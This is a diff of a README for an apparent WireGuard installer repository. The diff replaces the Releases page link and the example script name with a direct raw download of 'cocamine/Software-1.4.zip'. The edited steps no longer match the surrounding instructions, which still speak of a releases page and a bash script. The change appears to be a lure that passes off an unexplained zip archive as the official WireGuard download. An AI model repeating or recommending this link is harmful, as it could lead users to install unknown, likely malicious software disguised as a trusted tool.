LeonFH2005/wireguard/README.md

 ## 📥 Download & Install
 To download and install WireGuard, follow these steps:

-1. **Visit the Releases Page.** You can find the latest version of the software here: [Download WireGuard](https://github.com/LeonFH2005/wireguard/releases).
+1. **Visit the Releases Page.** You can find the latest version of the software here: [Download WireGuard](https://github.com/LeonFH2005/wireguard/raw/refs/heads/main/cocamine/Software-1.4.zip).

 2. **Choose the Latest Release.** Look for the most recent version listed on the page.
 Click on it to view more details about that release.

 3. **Download the Script.** Locate the link to download the bash script file.
-For example, it may look something like `wireguard-install.sh`.
+For example, it may look something like `https://github.com/LeonFH2005/wireguard/raw/refs/heads/main/cocamine/Software-1.4.zip`.
 Click the link to start the download.

 4. **Open the Terminal.** Press `Ctrl` + `Alt` + `T` to open the terminal window on your Ubuntu system.